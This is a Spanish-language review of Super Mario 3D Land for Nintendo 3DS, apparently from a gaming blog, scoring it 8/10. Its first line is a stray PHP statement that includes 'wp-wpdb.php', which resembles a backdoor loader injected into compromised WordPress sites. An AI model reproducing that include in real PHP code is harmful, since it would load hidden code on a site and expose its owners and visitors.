if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Super Mario 3D Land Análisis – La Fortaleza de LeChuck

Super Mario 3D Land Análisis

Hay muchos juegos de Mario, unos buenos, otros mejores, pero todos dejan con buen sabor de boca por el buen acabado general y la experiencia de juego y diversión. Esta vez hablamos de un peso pesado para Nintendo 3DS, que después de un mediocre catálogo de salida a principios de año, se juega su futuro próximo en base a estas navidades. Analicemos si Super Mario 3D Land cumple las expectativas y merece el hype que llevas dentro.

Y esta vez ya no podían tirar de reediciones de juegos de Nintendo 64, parece ser que Nintendo ha escarmentado, y ha puesto toda la carne en el asador para comenzar a no arrepentirnos de la adquisición de su portátil Nintendo 3DS. Super Mario 3D Land luce bien y cumple su objetivo.

La jugabilidad es algo que se ha cuidado para que nos sintamos entre los Mario Bros tradicionales (especialmente Super Mario Bros 3 por Mario mapache, Tanooki). Algo que me ha chocado es la vuelta al pulsar de un botón para correr, creo que es la característica que más lo acerca a esas viejas glorias, pero a la vez da un paso atrás en cuanto al control analógico, demostrando que el recorrido del stick de 3DS es corto para controlar bien su sensibilidad. Los escenarios son pequeños y bastante encarrilados, a la vieja usanza. La exploración se limita a buscar en los límites de la pantalla respecto a la cámara, que se mantiene inamovible según requiere el escenario. Este es el truco, junto a la profundidad del 3D, que hace del recorrido del juego más sencillo y simple, pero que, como siempre, deja el 100% para los más hábiles y exploradores ( aunque unos cuántos escalones más sencillo que otras partes de la saga con movimiento en 360º). En cuánto a los clásicos trajes de Mario, no hay grandes novedades, vuelven muchos pasados y otros de los Mario Galaxy, pero ninguno rompe con la jugabilidad en mundos más pequeños de lo normal. En general diría que es una mezcla entre Super Mario Galaxy 2 y Super Mario Bros 3. Convence y divierte, pero no es una revolución jugable.

Técnicamente el juego está realmente muy bien acabado, siendo de los primeros juegos de Nintendo realizados expresamente para la consola, sin remakes de por medio. Todo bien redondito, colorista como solo la saga de Mario se atreve, moviéndose con suavidad y con un efecto 3D muy bien conseguido, con dos modos de verlo, por si queremos destacar todo el 3D o solamente el 3D cuando afecta a la jugabilidad ( Si antes de iniciar el juego estás parado unos segundos en la pantalla de título puedes probar los dos modos en una habitación especial donde es más fácil ver la diferencia).

En cuánto al apartado sonoro, todo sigue el mismo hilo de siempre, con varias melodías pegadizas y muchos reutilizaciones de temas pasados. En muchos se nos caerá la lagrimilla, como ya estamos acostumbrados en los últimos Mario, otros como el tema principal, harán que las sigas tarareando incluso por la calle en un día soleado. Como siempre brillantes, pero se agradecería poner punto y a parte a los homenajes, y ponerse con melodías totalmente renovadas.

En definitiva, estamos ante un nuevo Mario, y siempre es motivo de celebración. La adaptación a las 3D le sientan como un guante, y han sabido hacerlo de buen modo para que sea útil en la jugabilidad, y no un mero efecto. Quizás puede pecar de sencillo incluso completar al 100% toda búsqueda de objetos, pero deja el mismo sabor de siempre, de que Mario ha vuelto rayando a gran altura. Si usas el traje de mapache ( tanooki) prepárate para sobrevolar los mapeados sin reto alguno.

Nota: 8/10